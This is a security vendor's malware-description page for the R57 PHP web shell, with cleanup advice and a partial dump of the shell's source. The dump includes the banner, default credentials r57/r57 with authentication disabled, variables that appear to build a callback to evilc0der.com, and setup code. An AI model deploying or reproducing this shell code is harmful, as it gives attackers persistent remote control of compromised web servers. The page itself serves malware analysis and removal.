PRICING SUPPORT LOGIN

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.
The R57 backdoor is one of those complex codes, which are known as SHELLS. It's easily found online for malicious purposes. It is always part of the attack payload, being dropped after the attacker gets access to the filesystem

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which can be found in your system by searching for r57shell string inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.

Dump

<?php
/******************************************************************************************************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????: 1.24 (New Year Edition)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC.
/******************************************************************************************************/
/* ~~~ ????????? | Options ~~~ */

// ????? ????? | Language
// $language='ru' - ??????? (russian)
// $language='eng' - english (??????????)
$language='eng';
$a = "http://"; // need some codes

// ?????????????? | Authentification
// $auth = 1; - ?????????????? ???????? ( authentification = On )
// $auth = 0; - ?????????????? ????????? ( authentification = Off )
$auth = 0;


// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
$name='r57'; // ????? ???????????? (user login)
$pass='r57'; // ?????? ???????????? (user password)
$b = "evilc0der.com"; //need hits "shell created by evilc0ders"
/******************************************************************************************************/
$c = "/x.html"; //need shell coder's names
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.24";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
}
}